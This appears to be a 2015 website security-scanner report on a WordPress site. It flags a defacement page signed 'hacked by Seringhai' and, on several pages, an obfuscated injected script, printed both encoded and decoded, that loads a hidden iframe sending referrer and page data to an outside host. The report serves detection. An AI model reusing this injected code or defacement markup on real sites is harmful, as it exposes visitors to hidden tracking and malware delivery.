Scanned pages/files
Request | Server response | Status |
http://laurenedits.com/ | 200 OK Content-Length: 1686 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: parthec.com ...[1324 bytes skipped]... ~ Sayap hitam ~ Mr.Little Haxor ~ Blitargetar ~ Salmandxx ~ Bonz frozen</marquee><br><br> <font face="Arial" size="3"><br>Suram Crew ~ Indonesian Defacer</font></br></font> <object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"> <param value="#ffffff" name="bgcolor"> <param value="mp3=http://parthec.com/images/war.mp3&loop=1&autoplay=1&volume=125" name="FlashVars"> <style>body{overflow:hidden;background-color:#000000}#q{font:40px Corier new;color:#000000;position:absolute;left:0;right:0;top:40%}</body> </html> Deface/Content modification. The following signature was found: hacked by Seringhai <html><head>
<title>hacked by Seringhai</title> <meta name="google-site-verification" content="hacked by Seringhai"/> <meta name="keywords" content="hacked by Seringhai,hacked by Seringhai,hacked by Seringhai"/> <meta name="rating" content="General" /> <meta name="description" content="Talk Less Do More"> <meta name="googlebot" content="index,follow"/> <meta name="robots" content="all"/> &l ...[1559 bytes skipped]... | ||
http://laurenedits.com/test404page.js | 404 Not Found Content-Length: 18075 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://laurenedits.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/js/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 2724 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/js/jquery.flexslider-min.js?ver=1.0 | 200 OK Content-Length: 11133 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/js/et_flexslider.js?ver=1.0 | 200 OK Content-Length: 2669 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15647 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 4777 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/js/easing.js | 200 OK Content-Length: 8301 Content-Type: application/javascript | clean |
http://laurenedits.com/wp-content/themes/SimplePress/js/superfish.js | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://laurenedits.com/about/ | 200 OK Content-Length: 19819 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://laurenedits.com/wp-includes/js/comment-reply.js?ver=3.4.2 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://laurenedits.com/contact/ | 200 OK Content-Length: 21059 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://laurenedits.com/services/ | 200 OK Content-Length: 19198 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: laurenedits.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Oct 2015 04:27:39 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 1686
Content-Type: text/html
Last-Modified: Sun, 29 Mar 2015 18:16:59 GMT
...1686 bytes of data.
GET / HTTP/1.1
Host: laurenedits.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Oct 2015 04:27:39 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 1686
Content-Type: text/html
Last-Modified: Sun, 29 Mar 2015 18:16:59 GMT
...1686 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: laurenedits.com
Referer: http://www.google.com/search?q=laurenedits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: laurenedits.com
Referer: http://www.google.com/search?q=laurenedits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=laurenedits.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laurenedits.com/
Result: laurenedits.com is not infected or malware details are not published yet.
Result: laurenedits.com is not infected or malware details are not published yet.